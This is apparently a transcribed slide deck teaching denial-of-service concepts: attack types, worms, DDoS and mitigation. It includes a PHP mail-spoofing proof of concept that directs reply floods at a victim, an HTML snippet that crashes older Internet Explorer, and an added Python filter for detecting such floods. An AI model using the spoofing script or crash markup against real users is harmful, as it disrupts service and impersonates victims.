Denial of Service

Post on 18-May-2015


Ahmad Muammar W. K. http://google.com/search?q=y3dips

Details

- DoS
- Types
- Simulation
- Internet Worm
- DDoS
- Discussion


DoS

A denial-of-service attack is an attack on a computer system or network that causes a loss of service to users.


Motives

- Money
- Revenge
- Prestige
- Gaining access
- Politics


DoS History

- Classical DoS
- Internet worms
- DDoS


Classical DoS

- Application bug
- Consumption of computational resources
- Disabling web traffic
- Mail bombing


Some Examples/Types

- TCP SYN flood
- ICMP/UDP/ECHO (ping) to broadcast addresses (SMURF)
- Out of Band (OOB) attack (winnuke:139)
- ARP poisoning
- Ping of Death (win95)
- Port flooding
- Mail bombing


Mass Spamming?

- A real life example
- Using SMTP
- Easy proof of concept

[Diagram labels]
Reply to: victim@dudul.com
Sender: anonymous@fvck.com
To: xxx@multiple server
Received: victim@dudul.com
Mail Server A, Mail Server B, Mail Server C


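<?php
// Proof of concept from the slide: From and Reply-To name the victim, not the real sender.
$recipient = "xxx@multiple mailserver";
$subject = "fake";
$mailheaders = "From: victim@dudul.com \n";
$mailheaders .= "Reply-To: victim@dudul.com\n";
$msg = "\nIts a spam\n";
// "tidak terkirim!" means "not sent!"
mail($recipient, $subject, $msg, $mailheaders) or die("tidak terkirim!");
?>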
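A receiving mail server can filter on the signature of the proof of concept above: the envelope sender and the address that replies go to belong to different domains, and the same reply target recurs across many messages. This is an added example, not part of the original slides; the sample messages are constructed, and the function names and the threshold are assumptions.

```python
from collections import Counter
from email import message_from_string
from email.utils import parseaddr

# Constructed sample messages (not from the original slides). Return-Path is
# the envelope sender as recorded by the receiving server at delivery time.
FORGED = (
    "Return-Path: <anonymous@fvck.com>\n"
    "From: victim@dudul.com\n"
    "Reply-To: victim@dudul.com\n"
    "Subject: fake\n\nIts a spam\n"
)
NORMAL = (
    "Return-Path: <alice@example.org>\n"
    "From: Alice <alice@example.org>\n"
    "Subject: hello\n\nhi\n"
)


def domain(value):
    """Return the lower-cased domain of an address header, or '' if absent."""
    addr = parseaddr(value or "")[1]
    return addr.rpartition("@")[2].lower() if "@" in addr else ""


def mismatched_reply_target(raw):
    """Return the address replies would go to when its domain differs from
    the envelope sender's domain, else None."""
    msg = message_from_string(raw)
    envelope = domain(msg["Return-Path"])
    target = msg["Reply-To"] or msg["From"]
    if envelope and domain(target) and domain(target) != envelope:
        return parseaddr(target)[1].lower()
    return None


def flag_reply_floods(raw_messages, threshold=3):
    """Count mismatched reply targets in a batch and return those that reach
    the threshold (hypothetical value; tune per site)."""
    hits = Counter(filter(None, map(mismatched_reply_target, raw_messages)))
    return {addr: n for addr, n in hits.items() if n >= threshold}


if __name__ == "__main__":
    print(flag_reply_floods([FORGED] * 5 + [NORMAL] * 2))
```

Mailing lists and forwarders also produce mismatched domains, so the per-target count, not a single mismatch, is what marks a flood.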


DDoS against

- Application
- Services
- System
- CPU, Memory, RAM
- Networking


DDoS Against IE

- Internet Explorer is the Microsoft Windows web browser
- Some versions have a hole in XML script
- Error in application

<!-- Discovered by Inge Henriksen (inge.henriksen@booleansoft.com) http://ingehenriksen.blogspot.com/ -->
<table>
<tr><td><IMG align=left>X X X<?xml:namespace prefix=v>
<v:X style="HEIGHT:1"></td></tr>
</table>


DDoS Against Apache

- Apache is a free web server
- Some versions are vulnerable to this kind of DoS
- Server temporarily down


DDoS Against CPU, Memory, RAM

- Limited resources
- Multiple processes
- Some infinite loops would suck more resources


DDoS Against Network

- Flooding the network
- Cut all traffic
- Fill the bandwidth


Worm

A computer program which replicates itself and is self-propagating. Worms, as opposed to viruses, are meant to spawn in network environments.


Worm

- Actively propagates itself
- Combined with system/application hole
- DDoS agent/zombie
- Web traffic flooding
- Mass war machine
- Resources take over


DDoS

- Distributed attack
- Multiple impact
- Zombie/Agent


- Any type of DoS attack
- Single user target

[Diagram: Attacker, six zombies, Target]


Survive (mitigate DDoS)

- Network configuration
- Change IP address
- Strong peripheral
- Filtering technique (signatures of the traffic)
- Some mirror/backup
